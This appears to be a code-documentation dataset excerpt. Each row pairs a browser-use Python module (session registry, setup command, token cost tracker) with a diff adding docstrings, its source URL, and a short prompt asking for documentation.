def get(self, name: str) -> SessionInfo | None:
return self._sessions.get(name)
def list_sessions(self) -> list[dict[str, Any]]:
return [
{
'name': s.name,
'browser_mode': s.browser_mode,
'headed': s.headed,
'profile': s.profile,
}
for s in self._sessions.values()
]
async def close_session(self, name: str) -> bool:
if name not in self._sessions:
return False
session = self._sessions.pop(name)
logger.info(f'Closing session: {name}')
# Note: Tunnels are managed independently via tunnel.py
# They persist across session close/open cycles
try:
await session.browser_session.kill()
except Exception as e:
logger.warning(f'Error closing session {name}: {e}')
return True
async def close_all(self) -> None:
for name in list(self._sessions.keys()):
await self.close_session(name)
async def create_browser_session(
mode: str,
headed: bool,
profile: str | None,
) -> BrowserSession:
from browser_use.skill_cli.install_config import get_mode_unavailable_error, is_mode_available
# Validate mode is available based on installation config
if not is_mode_available(mode):
raise RuntimeError(get_mode_unavailable_error(mode))
if mode == 'chromium':
return BrowserSession(
headless=not headed,
)
elif mode == 'real':
from browser_use.skill_cli.utils import find_chrome_executable, get_chrome_profile_path
chrome_path = find_chrome_executable()
if not chrome_path:
raise RuntimeError('Could not find Chrome executable. Please install Chrome or specify --browser chromium')
# Always get the Chrome user data directory (not the profile subdirectory)
user_data_dir = get_chrome_profile_path(None)
# Profile directory defaults to 'Default', or use the specified profile name
profile_directory = profile if profile else 'Default'
return BrowserSession(
executable_path=chrome_path,
user_data_dir=user_data_dir,
profile_directory=profile_directory,
headless=not headed, # Headless by default, --headed for visible
)
elif mode == 'remote':
from browser_use.skill_cli.api_key import require_api_key
require_api_key('Remote browser')
# Profile is used as cloud_profile_id for remote mode
return BrowserSession(
use_cloud=True,
cloud_profile_id=profile,
)
else:
raise ValueError(f'Unknown browser mode: {mode}') | --- +++ @@ -1,3 +1,4 @@+"""Session registry - manages BrowserSession instances."""
import logging
from dataclasses import dataclass, field
@@ -11,6 +12,7 @@
@dataclass
class SessionInfo:
+ """Information about a browser session."""
name: str
browser_mode: str
@@ -21,6 +23,11 @@
class SessionRegistry:
+ """Registry of active browser sessions.
+
+ Sessions are created on-demand when first accessed. Each named session
+ is isolated with its own BrowserSession and Python namespace.
+ """
def __init__(self) -> None:
self._sessions: dict[str, SessionInfo] = {}
@@ -32,6 +39,7 @@ headed: bool,
profile: str | None,
) -> SessionInfo:
+ """Get existing session or create new one."""
if name in self._sessions:
return self._sessions[name]
@@ -51,9 +59,11 @@ return session_info
def get(self, name: str) -> SessionInfo | None:
+ """Get session by name."""
return self._sessions.get(name)
def list_sessions(self) -> list[dict[str, Any]]:
+ """List all active sessions."""
return [
{
'name': s.name,
@@ -65,6 +75,7 @@ ]
async def close_session(self, name: str) -> bool:
+ """Close and remove a session."""
if name not in self._sessions:
return False
@@ -81,6 +92,7 @@ return True
async def close_all(self) -> None:
+ """Close all sessions."""
for name in list(self._sessions.keys()):
await self.close_session(name)
@@ -90,6 +102,16 @@ headed: bool,
profile: str | None,
) -> BrowserSession:
+ """Create BrowserSession based on mode.
+
+ Modes:
+ - chromium: Playwright-managed Chromium (default)
+ - real: User's Chrome with profile
+ - remote: Browser-Use Cloud (requires API key)
+
+ Raises:
+ RuntimeError: If the requested mode is not available based on installation config
+ """
from browser_use.skill_cli.install_config import get_mode_unavailable_error, is_mode_available
# Validate mode is available based on installation config
@@ -131,4 +153,4 @@ )
else:
- raise ValueError(f'Unknown browser mode: {mode}')+ raise ValueError(f'Unknown browser mode: {mode}')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/sessions.py |
Document this code for team use |
import logging
from typing import Any, Literal
logger = logging.getLogger(__name__)
COMMANDS = {'setup'}
async def handle(
action: str,
params: dict[str, Any],
) -> dict[str, Any]:
assert action == 'setup'
mode: Literal['local', 'remote', 'full'] = params.get('mode', 'local')
yes: bool = params.get('yes', False)
api_key: str | None = params.get('api_key')
json_output: bool = params.get('json', False)
# Validate mode
if mode not in ('local', 'remote', 'full'):
return {'error': f'Invalid mode: {mode}. Must be local, remote, or full'}
# Run setup flow
try:
checks = await run_checks(mode)
if not json_output:
_log_checks(checks)
# Plan actions
actions = plan_actions(checks, mode, yes, api_key)
if not json_output:
_log_actions(actions)
# Execute actions
await execute_actions(actions, mode, api_key, json_output)
# Validate
validation = await validate_setup(mode)
if not json_output:
_log_validation(validation)
return {
'status': 'success',
'mode': mode,
'checks': checks,
'validation': validation,
}
except Exception as e:
logger.exception(f'Setup failed: {e}')
error_msg = str(e)
if json_output:
return {'error': error_msg}
return {'error': error_msg}
async def run_checks(mode: Literal['local', 'remote', 'full']) -> dict[str, Any]:
checks: dict[str, Any] = {}
# Package check
try:
import browser_use
checks['browser_use_package'] = {
'status': 'ok',
'message': f'browser-use {browser_use.__version__}'
if hasattr(browser_use, '__version__')
else 'browser-use installed',
}
except ImportError:
checks['browser_use_package'] = {
'status': 'error',
'message': 'browser-use not installed',
}
# Browser check (local and full modes)
if mode in ('local', 'full'):
checks['browser'] = await _check_browser()
# API key check (remote and full modes)
if mode in ('remote', 'full'):
from browser_use.skill_cli.api_key import check_api_key
api_status = check_api_key()
if api_status['available']:
checks['api_key'] = {
'status': 'ok',
'message': f'Configured via {api_status["source"]} ({api_status["key_prefix"]}...)',
}
else:
checks['api_key'] = {
'status': 'missing',
'message': 'Not configured',
}
# Cloudflared check (remote and full modes)
if mode in ('remote', 'full'):
from browser_use.skill_cli.tunnel import get_tunnel_manager
tunnel_mgr = get_tunnel_manager()
status = tunnel_mgr.get_status()
checks['cloudflared'] = {
'status': 'ok' if status['available'] else 'missing',
'message': status['note'],
}
return checks
async def _check_browser() -> dict[str, Any]:
try:
from browser_use.browser.profile import BrowserProfile
profile = BrowserProfile(headless=True)
# Just check if we can create a session without actually launching
return {
'status': 'ok',
'message': 'Browser available',
}
except Exception as e:
return {
'status': 'error',
'message': f'Browser check failed: {e}',
}
def plan_actions(
checks: dict[str, Any],
mode: Literal['local', 'remote', 'full'],
yes: bool,
api_key: str | None,
) -> list[dict[str, Any]]:
actions: list[dict[str, Any]] = []
# Browser installation (local/full)
if mode in ('local', 'full'):
browser_check = checks.get('browser', {})
if browser_check.get('status') != 'ok':
actions.append(
{
'type': 'install_browser',
'description': 'Install browser (Chromium)',
'required': True,
}
)
# API key configuration (remote/full)
if mode in ('remote', 'full'):
api_check = checks.get('api_key', {})
if api_check.get('status') != 'ok':
if api_key:
actions.append(
{
'type': 'configure_api_key',
'description': 'Configure API key',
'required': True,
'api_key': api_key,
}
)
elif not yes:
actions.append(
{
'type': 'prompt_api_key',
'description': 'Prompt for API key',
'required': False,
}
)
# Cloudflared (remote/full)
if mode in ('remote', 'full'):
cloudflared_check = checks.get('cloudflared', {})
if cloudflared_check.get('status') != 'ok':
actions.append(
{
'type': 'install_cloudflared',
'description': 'Install cloudflared (for tunneling)',
'required': True,
}
)
return actions
async def execute_actions(
actions: list[dict[str, Any]],
mode: Literal['local', 'remote', 'full'],
api_key: str | None,
json_output: bool,
) -> None:
for action in actions:
action_type = action['type']
if action_type == 'install_browser':
if not json_output:
print('📦 Installing Chromium browser (~300MB)...')
# Browser will be installed on first use by Playwright
if not json_output:
print('✓ Browser available (will be installed on first use)')
elif action_type == 'configure_api_key':
if not json_output:
print('🔑 Configuring API key...')
from browser_use.skill_cli.api_key import save_api_key
if api_key:
save_api_key(api_key)
if not json_output:
print('✓ API key configured')
elif action_type == 'prompt_api_key':
if not json_output:
print('🔑 API key not configured')
print(' Set via: export BROWSER_USE_API_KEY=your_key')
print(' Or: browser-use setup --api-key <key>')
elif action_type == 'install_cloudflared':
if not json_output:
print('⚠ cloudflared not installed')
print(' Install via:')
print(' macOS: brew install cloudflared')
print(
' Linux: curl -L https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 -o ~/.local/bin/cloudflared && chmod +x ~/.local/bin/cloudflared'
)
print(' Windows: winget install Cloudflare.cloudflared')
print()
print(' Or re-run install.sh which installs cloudflared automatically.')
async def validate_setup(
mode: Literal['local', 'remote', 'full'],
) -> dict[str, Any]:
results: dict[str, Any] = {}
# Check imports
try:
import browser_use # noqa: F401
results['browser_use_import'] = 'ok'
except ImportError:
results['browser_use_import'] = 'failed'
# Validate mode requirements
if mode in ('local', 'full'):
try:
from browser_use.browser.profile import BrowserProfile
browser_profile = BrowserProfile(headless=True)
results['browser_available'] = 'ok'
except Exception as e:
results['browser_available'] = f'failed: {e}'
if mode in ('remote', 'full'):
from browser_use.skill_cli.api_key import check_api_key
from browser_use.skill_cli.tunnel import get_tunnel_manager
api_check = check_api_key()
results['api_key_available'] = api_check['available']
tunnel_mgr = get_tunnel_manager()
results['cloudflared_available'] = tunnel_mgr.is_available()
return results
def _log_checks(checks: dict[str, Any]) -> None:
print('\n✓ Running checks...\n')
for name, check in checks.items():
status = check.get('status', 'unknown')
message = check.get('message', '')
icon = '✓' if status == 'ok' else '⚠' if status == 'missing' else '✗'
print(f' {icon} {name.replace("_", " ")}: {message}')
print()
def _log_actions(actions: list[dict[str, Any]]) -> None:
if not actions:
print('✓ No additional setup needed!\n')
return
print('\n📋 Setup actions:\n')
for i, action in enumerate(actions, 1):
required = '(required)' if action.get('required') else '(optional)'
print(f' {i}. {action["description"]} {required}')
print()
def _log_validation(validation: dict[str, Any]) -> None:
print('\n✓ Validation:\n')
for name, result in validation.items():
icon = '✓' if result == 'ok' else '✗'
print(f' {icon} {name.replace("_", " ")}: {result}')
print() | --- +++ @@ -1,3 +1,8 @@+"""Setup command - configure browser-use for first-time use.
+
+Handles dependency installation and configuration with mode-based
+setup (local/remote/full) and optional automatic fixes.
+"""
import logging
from typing import Any, Literal
@@ -11,6 +16,7 @@ action: str,
params: dict[str, Any],
) -> dict[str, Any]:
+ """Handle setup command."""
assert action == 'setup'
mode: Literal['local', 'remote', 'full'] = params.get('mode', 'local')
@@ -60,6 +66,11 @@
async def run_checks(mode: Literal['local', 'remote', 'full']) -> dict[str, Any]:
+ """Run pre-flight checks without making changes.
+
+ Returns:
+ Dict mapping check names to their status
+ """
checks: dict[str, Any] = {}
# Package check
@@ -113,6 +124,7 @@
async def _check_browser() -> dict[str, Any]:
+ """Check if browser is available."""
try:
from browser_use.browser.profile import BrowserProfile
@@ -135,6 +147,11 @@ yes: bool,
api_key: str | None,
) -> list[dict[str, Any]]:
+ """Plan which actions to take based on checks.
+
+ Returns:
+ List of actions to execute
+ """
actions: list[dict[str, Any]] = []
# Browser installation (local/full)
@@ -192,6 +209,14 @@ api_key: str | None,
json_output: bool,
) -> None:
+ """Execute planned actions.
+
+ Args:
+ actions: List of actions to execute
+ mode: Setup mode (local/remote/full)
+ api_key: Optional API key to configure
+ json_output: Whether to output JSON
+ """
for action in actions:
action_type = action['type']
@@ -234,6 +259,11 @@ async def validate_setup(
mode: Literal['local', 'remote', 'full'],
) -> dict[str, Any]:
+ """Validate that setup worked.
+
+ Returns:
+ Dict with validation results
+ """
results: dict[str, Any] = {}
# Check imports
@@ -268,6 +298,7 @@
def _log_checks(checks: dict[str, Any]) -> None:
+ """Log check results."""
print('\n✓ Running checks...\n')
for name, check in checks.items():
status = check.get('status', 'unknown')
@@ -278,6 +309,7 @@
def _log_actions(actions: list[dict[str, Any]]) -> None:
+ """Log planned actions."""
if not actions:
print('✓ No additional setup needed!\n')
return
@@ -290,8 +322,9 @@
def _log_validation(validation: dict[str, Any]) -> None:
+ """Log validation results."""
print('\n✓ Validation:\n')
for name, result in validation.items():
icon = '✓' if result == 'ok' else '✗'
print(f' {icon} {name.replace("_", " ")}: {result}')
- print()+ print()
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/setup.py |
Add docstrings following best practices |
import logging
import os
from datetime import datetime, timedelta
from pathlib import Path
from typing import Any
import anyio
import httpx
from dotenv import load_dotenv
from browser_use.llm.base import BaseChatModel
from browser_use.llm.views import ChatInvokeUsage
from browser_use.tokens.custom_pricing import CUSTOM_MODEL_PRICING
from browser_use.tokens.mappings import MODEL_TO_LITELLM
from browser_use.tokens.views import (
CachedPricingData,
ModelPricing,
ModelUsageStats,
ModelUsageTokens,
TokenCostCalculated,
TokenUsageEntry,
UsageSummary,
)
from browser_use.utils import create_task_with_error_handling
load_dotenv()
from browser_use.config import CONFIG
logger = logging.getLogger(__name__)
cost_logger = logging.getLogger('cost')
def xdg_cache_home() -> Path:
default = Path.home() / '.cache'
if CONFIG.XDG_CACHE_HOME and (path := Path(CONFIG.XDG_CACHE_HOME)).is_absolute():
return path
return default
class TokenCost:
CACHE_DIR_NAME = 'browser_use/token_cost'
CACHE_DURATION = timedelta(days=1)
PRICING_URL = 'https://raw.githubusercontent.com/BerriAI/litellm/main/model_prices_and_context_window.json'
def __init__(self, include_cost: bool = False):
self.include_cost = include_cost or os.getenv('BROWSER_USE_CALCULATE_COST', 'false').lower() == 'true'
self.usage_history: list[TokenUsageEntry] = []
self.registered_llms: dict[str, BaseChatModel] = {}
self._pricing_data: dict[str, Any] | None = None
self._initialized = False
self._cache_dir = xdg_cache_home() / self.CACHE_DIR_NAME
async def initialize(self) -> None:
if not self._initialized:
if self.include_cost:
await self._load_pricing_data()
self._initialized = True
async def _load_pricing_data(self) -> None:
# Try to find a valid cache file
cache_file = await self._find_valid_cache()
if cache_file:
await self._load_from_cache(cache_file)
else:
await self._fetch_and_cache_pricing_data()
async def _find_valid_cache(self) -> Path | None:
try:
# Ensure cache directory exists
self._cache_dir.mkdir(parents=True, exist_ok=True)
# List all JSON files in the cache directory
cache_files = list(self._cache_dir.glob('*.json'))
if not cache_files:
return None
# Sort by modification time (most recent first)
cache_files.sort(key=lambda f: f.stat().st_mtime, reverse=True)
# Check each file until we find a valid one
for cache_file in cache_files:
if await self._is_cache_valid(cache_file):
return cache_file
else:
# Clean up old cache files
try:
os.remove(cache_file)
except Exception:
pass
return None
except Exception:
return None
async def _is_cache_valid(self, cache_file: Path) -> bool:
try:
if not cache_file.exists():
return False
# Read the cached data
cached = CachedPricingData.model_validate_json(await anyio.Path(cache_file).read_text())
# Check if cache is still valid
return datetime.now() - cached.timestamp < self.CACHE_DURATION
except Exception:
return False
async def _load_from_cache(self, cache_file: Path) -> None:
try:
content = await anyio.Path(cache_file).read_text()
cached = CachedPricingData.model_validate_json(content)
self._pricing_data = cached.data
except Exception as e:
logger.debug(f'Error loading cached pricing data from {cache_file}: {e}')
# Fall back to fetching
await self._fetch_and_cache_pricing_data()
async def _fetch_and_cache_pricing_data(self) -> None:
try:
async with httpx.AsyncClient() as client:
response = await client.get(self.PRICING_URL, timeout=30)
response.raise_for_status()
self._pricing_data = response.json()
# Create cache object with timestamp
cached = CachedPricingData(timestamp=datetime.now(), data=self._pricing_data or {})
# Ensure cache directory exists
self._cache_dir.mkdir(parents=True, exist_ok=True)
# Create cache file with timestamp in filename
timestamp_str = datetime.now().strftime('%Y%m%d_%H%M%S')
cache_file = self._cache_dir / f'pricing_{timestamp_str}.json'
await anyio.Path(cache_file).write_text(cached.model_dump_json(indent=2))
except Exception as e:
logger.debug(f'Error fetching pricing data: {e}')
# Fall back to empty pricing data
self._pricing_data = {}
async def get_model_pricing(self, model_name: str) -> ModelPricing | None:
# Ensure we're initialized
if not self._initialized:
await self.initialize()
# Check custom pricing first
if model_name in CUSTOM_MODEL_PRICING:
data = CUSTOM_MODEL_PRICING[model_name]
return ModelPricing(
model=model_name,
input_cost_per_token=data.get('input_cost_per_token'),
output_cost_per_token=data.get('output_cost_per_token'),
max_tokens=data.get('max_tokens'),
max_input_tokens=data.get('max_input_tokens'),
max_output_tokens=data.get('max_output_tokens'),
cache_read_input_token_cost=data.get('cache_read_input_token_cost'),
cache_creation_input_token_cost=data.get('cache_creation_input_token_cost'),
)
# Map model name to LiteLLM model name if needed
litellm_model_name = MODEL_TO_LITELLM.get(model_name, model_name)
if not self._pricing_data or litellm_model_name not in self._pricing_data:
return None
data = self._pricing_data[litellm_model_name]
return ModelPricing(
model=model_name,
input_cost_per_token=data.get('input_cost_per_token'),
output_cost_per_token=data.get('output_cost_per_token'),
max_tokens=data.get('max_tokens'),
max_input_tokens=data.get('max_input_tokens'),
max_output_tokens=data.get('max_output_tokens'),
cache_read_input_token_cost=data.get('cache_read_input_token_cost'),
cache_creation_input_token_cost=data.get('cache_creation_input_token_cost'),
)
async def calculate_cost(self, model: str, usage: ChatInvokeUsage) -> TokenCostCalculated | None:
if not self.include_cost:
return None
data = await self.get_model_pricing(model)
if data is None:
return None
uncached_prompt_tokens = usage.prompt_tokens - (usage.prompt_cached_tokens or 0)
return TokenCostCalculated(
new_prompt_tokens=usage.prompt_tokens,
new_prompt_cost=uncached_prompt_tokens * (data.input_cost_per_token or 0),
# Cached tokens
prompt_read_cached_tokens=usage.prompt_cached_tokens,
prompt_read_cached_cost=usage.prompt_cached_tokens * data.cache_read_input_token_cost
if usage.prompt_cached_tokens and data.cache_read_input_token_cost
else None,
# Cache creation tokens
prompt_cached_creation_tokens=usage.prompt_cache_creation_tokens,
prompt_cache_creation_cost=usage.prompt_cache_creation_tokens * data.cache_creation_input_token_cost
if data.cache_creation_input_token_cost and usage.prompt_cache_creation_tokens
else None,
# Completion tokens
completion_tokens=usage.completion_tokens,
completion_cost=usage.completion_tokens * float(data.output_cost_per_token or 0),
)
def add_usage(self, model: str, usage: ChatInvokeUsage) -> TokenUsageEntry:
entry = TokenUsageEntry(
model=model,
timestamp=datetime.now(),
usage=usage,
)
self.usage_history.append(entry)
return entry
# async def _log_non_usage_llm(self, llm: BaseChatModel) -> None:
# """Log non-usage to the logger"""
# C_CYAN = '\033[96m'
# C_RESET = '\033[0m'
# cost_logger.debug(f'🧠 llm : {C_CYAN}{llm.model}{C_RESET} (no usage found)')
async def _log_usage(self, model: str, usage: TokenUsageEntry) -> None:
if not self._initialized:
await self.initialize()
# ANSI color codes
C_CYAN = '\033[96m'
C_GREEN = '\033[92m'
C_RESET = '\033[0m'
# Always get cost breakdown for token details (even if not showing costs)
cost = await self.calculate_cost(model, usage.usage)
# Build input tokens breakdown
input_part = self._build_input_tokens_display(usage.usage, cost)
# Build output tokens display
completion_tokens_fmt = self._format_tokens(usage.usage.completion_tokens)
if self.include_cost and cost and cost.completion_cost > 0:
output_part = f'📤 {C_GREEN}{completion_tokens_fmt} (${cost.completion_cost:.4f}){C_RESET}'
else:
output_part = f'📤 {C_GREEN}{completion_tokens_fmt}{C_RESET}'
cost_logger.debug(f'🧠 {C_CYAN}{model}{C_RESET} | {input_part} | {output_part}')
def _build_input_tokens_display(self, usage: ChatInvokeUsage, cost: TokenCostCalculated | None) -> str:
C_YELLOW = '\033[93m'
C_BLUE = '\033[94m'
C_RESET = '\033[0m'
parts = []
# Always show token breakdown if we have cache information, regardless of cost tracking
if usage.prompt_cached_tokens or usage.prompt_cache_creation_tokens:
# Calculate actual new tokens (non-cached)
new_tokens = usage.prompt_tokens - (usage.prompt_cached_tokens or 0)
if new_tokens > 0:
new_tokens_fmt = self._format_tokens(new_tokens)
if self.include_cost and cost and cost.new_prompt_cost > 0:
parts.append(f'🆕 {C_YELLOW}{new_tokens_fmt} (${cost.new_prompt_cost:.4f}){C_RESET}')
else:
parts.append(f'🆕 {C_YELLOW}{new_tokens_fmt}{C_RESET}')
if usage.prompt_cached_tokens:
cached_tokens_fmt = self._format_tokens(usage.prompt_cached_tokens)
if self.include_cost and cost and cost.prompt_read_cached_cost:
parts.append(f'💾 {C_BLUE}{cached_tokens_fmt} (${cost.prompt_read_cached_cost:.4f}){C_RESET}')
else:
parts.append(f'💾 {C_BLUE}{cached_tokens_fmt}{C_RESET}')
if usage.prompt_cache_creation_tokens:
creation_tokens_fmt = self._format_tokens(usage.prompt_cache_creation_tokens)
if self.include_cost and cost and cost.prompt_cache_creation_cost:
parts.append(f'🔧 {C_BLUE}{creation_tokens_fmt} (${cost.prompt_cache_creation_cost:.4f}){C_RESET}')
else:
parts.append(f'🔧 {C_BLUE}{creation_tokens_fmt}{C_RESET}')
if not parts:
# Fallback to simple display when no cache information available
total_tokens_fmt = self._format_tokens(usage.prompt_tokens)
if self.include_cost and cost and cost.new_prompt_cost > 0:
parts.append(f'📥 {C_YELLOW}{total_tokens_fmt} (${cost.new_prompt_cost:.4f}){C_RESET}')
else:
parts.append(f'📥 {C_YELLOW}{total_tokens_fmt}{C_RESET}')
return ' + '.join(parts)
def register_llm(self, llm: BaseChatModel) -> BaseChatModel:
# Use instance ID as key to avoid collisions between multiple instances
instance_id = str(id(llm))
# Check if this exact instance is already registered
if instance_id in self.registered_llms:
logger.debug(f'LLM instance {instance_id} ({llm.provider}_{llm.model}) is already registered')
return llm
self.registered_llms[instance_id] = llm
# Store the original method
original_ainvoke = llm.ainvoke
# Store reference to self for use in the closure
token_cost_service = self
# Create a wrapped version that tracks usage
async def tracked_ainvoke(messages, output_format=None, **kwargs):
# Call the original method, passing through any additional kwargs
result = await original_ainvoke(messages, output_format, **kwargs)
# Track usage if available (no await needed since add_usage is now sync)
# Use llm.model instead of llm.name for consistency with get_usage_tokens_for_model()
if result.usage:
usage = token_cost_service.add_usage(llm.model, result.usage)
logger.debug(f'Token cost service: {usage}')
create_task_with_error_handling(
token_cost_service._log_usage(llm.model, usage), name='log_token_usage', suppress_exceptions=True
)
# else:
# await token_cost_service._log_non_usage_llm(llm)
return result
# Replace the method with our tracked version
# Using setattr to avoid type checking issues with overloaded methods
setattr(llm, 'ainvoke', tracked_ainvoke)
return llm
def get_usage_tokens_for_model(self, model: str) -> ModelUsageTokens:
filtered_usage = [u for u in self.usage_history if u.model == model]
return ModelUsageTokens(
model=model,
prompt_tokens=sum(u.usage.prompt_tokens for u in filtered_usage),
prompt_cached_tokens=sum(u.usage.prompt_cached_tokens or 0 for u in filtered_usage),
completion_tokens=sum(u.usage.completion_tokens for u in filtered_usage),
total_tokens=sum(u.usage.prompt_tokens + u.usage.completion_tokens for u in filtered_usage),
)
async def get_usage_summary(self, model: str | None = None, since: datetime | None = None) -> UsageSummary:
filtered_usage = self.usage_history
if model:
filtered_usage = [u for u in filtered_usage if u.model == model]
if since:
filtered_usage = [u for u in filtered_usage if u.timestamp >= since]
if not filtered_usage:
return UsageSummary(
total_prompt_tokens=0,
total_prompt_cost=0.0,
total_prompt_cached_tokens=0,
total_prompt_cached_cost=0.0,
total_completion_tokens=0,
total_completion_cost=0.0,
total_tokens=0,
total_cost=0.0,
entry_count=0,
)
# Calculate totals
total_prompt = sum(u.usage.prompt_tokens for u in filtered_usage)
total_completion = sum(u.usage.completion_tokens for u in filtered_usage)
total_tokens = total_prompt + total_completion
total_prompt_cached = sum(u.usage.prompt_cached_tokens or 0 for u in filtered_usage)
# Calculate per-model stats with record-by-record cost calculation
model_stats: dict[str, ModelUsageStats] = {}
total_prompt_cost = 0.0
total_completion_cost = 0.0
total_prompt_cached_cost = 0.0
for entry in filtered_usage:
if entry.model not in model_stats:
model_stats[entry.model] = ModelUsageStats(model=entry.model)
stats = model_stats[entry.model]
stats.prompt_tokens += entry.usage.prompt_tokens
stats.completion_tokens += entry.usage.completion_tokens
stats.total_tokens += entry.usage.prompt_tokens + entry.usage.completion_tokens
stats.invocations += 1
if self.include_cost:
# Calculate cost record by record using the updated calculate_cost function
cost = await self.calculate_cost(entry.model, entry.usage)
if cost:
stats.cost += cost.total_cost
total_prompt_cost += cost.prompt_cost
total_completion_cost += cost.completion_cost
total_prompt_cached_cost += cost.prompt_read_cached_cost or 0
# Calculate averages
for stats in model_stats.values():
if stats.invocations > 0:
stats.average_tokens_per_invocation = stats.total_tokens / stats.invocations
return UsageSummary(
total_prompt_tokens=total_prompt,
total_prompt_cost=total_prompt_cost,
total_prompt_cached_tokens=total_prompt_cached,
total_prompt_cached_cost=total_prompt_cached_cost,
total_completion_tokens=total_completion,
total_completion_cost=total_completion_cost,
total_tokens=total_tokens,
total_cost=total_prompt_cost + total_completion_cost + total_prompt_cached_cost,
entry_count=len(filtered_usage),
by_model=model_stats,
)
def _format_tokens(self, tokens: int) -> str:
if tokens >= 1000000000:
return f'{tokens / 1000000000:.1f}B'
if tokens >= 1000000:
return f'{tokens / 1000000:.1f}M'
if tokens >= 1000:
return f'{tokens / 1000:.1f}k'
return str(tokens)
async def log_usage_summary(self) -> None:
if not self.usage_history:
return
summary = await self.get_usage_summary()
if summary.entry_count == 0:
return
# ANSI color codes
C_CYAN = '\033[96m'
C_YELLOW = '\033[93m'
C_GREEN = '\033[92m'
C_BLUE = '\033[94m'
C_MAGENTA = '\033[95m'
C_RESET = '\033[0m'
C_BOLD = '\033[1m'
# Log overall summary
total_tokens_fmt = self._format_tokens(summary.total_tokens)
prompt_tokens_fmt = self._format_tokens(summary.total_prompt_tokens)
completion_tokens_fmt = self._format_tokens(summary.total_completion_tokens)
# Format cost breakdowns for input and output (only if cost tracking is enabled)
if self.include_cost and summary.total_cost > 0:
total_cost_part = f' (${C_MAGENTA}{summary.total_cost:.4f}{C_RESET})'
prompt_cost_part = f' (${summary.total_prompt_cost:.4f})'
completion_cost_part = f' (${summary.total_completion_cost:.4f})'
else:
total_cost_part = ''
prompt_cost_part = ''
completion_cost_part = ''
if len(summary.by_model) > 1:
cost_logger.debug(
f'💲 {C_BOLD}Total Usage Summary{C_RESET}: {C_BLUE}{total_tokens_fmt} tokens{C_RESET}{total_cost_part} | '
f'⬅️ {C_YELLOW}{prompt_tokens_fmt}{prompt_cost_part}{C_RESET} | ➡️ {C_GREEN}{completion_tokens_fmt}{completion_cost_part}{C_RESET}'
)
for model, stats in summary.by_model.items():
# Format tokens
model_total_fmt = self._format_tokens(stats.total_tokens)
model_prompt_fmt = self._format_tokens(stats.prompt_tokens)
model_completion_fmt = self._format_tokens(stats.completion_tokens)
avg_tokens_fmt = self._format_tokens(int(stats.average_tokens_per_invocation))
# Format cost display (only if cost tracking is enabled)
if self.include_cost:
# Calculate per-model costs on-the-fly
total_model_cost = 0.0
model_prompt_cost = 0.0
model_completion_cost = 0.0
# Calculate costs for this model
for entry in self.usage_history:
if entry.model == model:
cost = await self.calculate_cost(entry.model, entry.usage)
if cost:
model_prompt_cost += cost.prompt_cost
model_completion_cost += cost.completion_cost
total_model_cost = model_prompt_cost + model_completion_cost
if total_model_cost > 0:
cost_part = f' (${C_MAGENTA}{total_model_cost:.4f}{C_RESET})'
prompt_part = f'{C_YELLOW}{model_prompt_fmt} (${model_prompt_cost:.4f}){C_RESET}'
completion_part = f'{C_GREEN}{model_completion_fmt} (${model_completion_cost:.4f}){C_RESET}'
else:
cost_part = ''
prompt_part = f'{C_YELLOW}{model_prompt_fmt}{C_RESET}'
completion_part = f'{C_GREEN}{model_completion_fmt}{C_RESET}'
else:
cost_part = ''
prompt_part = f'{C_YELLOW}{model_prompt_fmt}{C_RESET}'
completion_part = f'{C_GREEN}{model_completion_fmt}{C_RESET}'
cost_logger.debug(
f' 🤖 {C_CYAN}{model}{C_RESET}: {C_BLUE}{model_total_fmt} tokens{C_RESET}{cost_part} | '
f'⬅️ {prompt_part} | ➡️ {completion_part} | '
f'📞 {stats.invocations} calls | 📈 {avg_tokens_fmt}/call'
)
async def get_cost_by_model(self) -> dict[str, ModelUsageStats]:
summary = await self.get_usage_summary()
return summary.by_model
def clear_history(self) -> None:
self.usage_history = []
async def refresh_pricing_data(self) -> None:
if self.include_cost:
await self._fetch_and_cache_pricing_data()
async def clean_old_caches(self, keep_count: int = 3) -> None:
try:
# List all JSON files in the cache directory
cache_files = list(self._cache_dir.glob('*.json'))
if len(cache_files) <= keep_count:
return
# Sort by modification time (oldest first)
cache_files.sort(key=lambda f: f.stat().st_mtime)
# Remove all but the most recent files
for cache_file in cache_files[:-keep_count]:
try:
os.remove(cache_file)
except Exception:
pass
except Exception as e:
logger.debug(f'Error cleaning old cache files: {e}')
async def ensure_pricing_loaded(self) -> None:
if not self._initialized and self.include_cost:
# This will run in the background and won't block
await self.initialize() | --- +++ @@ -1,3 +1,9 @@+"""
+Token cost service that tracks LLM token usage and costs.
+
+Fetches pricing data from LiteLLM repository and caches it for 1 day.
+Automatically tracks token usage when LLMs are registered and invoked.
+"""
import logging
import os
@@ -40,6 +46,7 @@
class TokenCost:
+ """Service for tracking token usage and calculating costs"""
CACHE_DIR_NAME = 'browser_use/token_cost'
CACHE_DURATION = timedelta(days=1)
@@ -55,12 +62,14 @@ self._cache_dir = xdg_cache_home() / self.CACHE_DIR_NAME
async def initialize(self) -> None:
+ """Initialize the service by loading pricing data"""
if not self._initialized:
if self.include_cost:
await self._load_pricing_data()
self._initialized = True
async def _load_pricing_data(self) -> None:
+ """Load pricing data from cache or fetch from GitHub"""
# Try to find a valid cache file
cache_file = await self._find_valid_cache()
@@ -70,6 +79,7 @@ await self._fetch_and_cache_pricing_data()
async def _find_valid_cache(self) -> Path | None:
+ """Find the most recent valid cache file"""
try:
# Ensure cache directory exists
self._cache_dir.mkdir(parents=True, exist_ok=True)
@@ -99,6 +109,7 @@ return None
async def _is_cache_valid(self, cache_file: Path) -> bool:
+ """Check if a specific cache file is valid and not expired"""
try:
if not cache_file.exists():
return False
@@ -112,6 +123,7 @@ return False
async def _load_from_cache(self, cache_file: Path) -> None:
+ """Load pricing data from a specific cache file"""
try:
content = await anyio.Path(cache_file).read_text()
cached = CachedPricingData.model_validate_json(content)
@@ -122,6 +134,7 @@ await self._fetch_and_cache_pricing_data()
async def _fetch_and_cache_pricing_data(self) -> None:
+ """Fetch pricing data from LiteLLM GitHub and cache it with timestamp"""
try:
async with httpx.AsyncClient() as client:
response = await client.get(self.PRICING_URL, timeout=30)
@@ -146,6 +159,7 @@ self._pricing_data = {}
async def get_model_pricing(self, model_name: str) -> ModelPricing | None:
+ """Get pricing information for a specific model"""
# Ensure we're initialized
if not self._initialized:
await self.initialize()
@@ -211,6 +225,7 @@ )
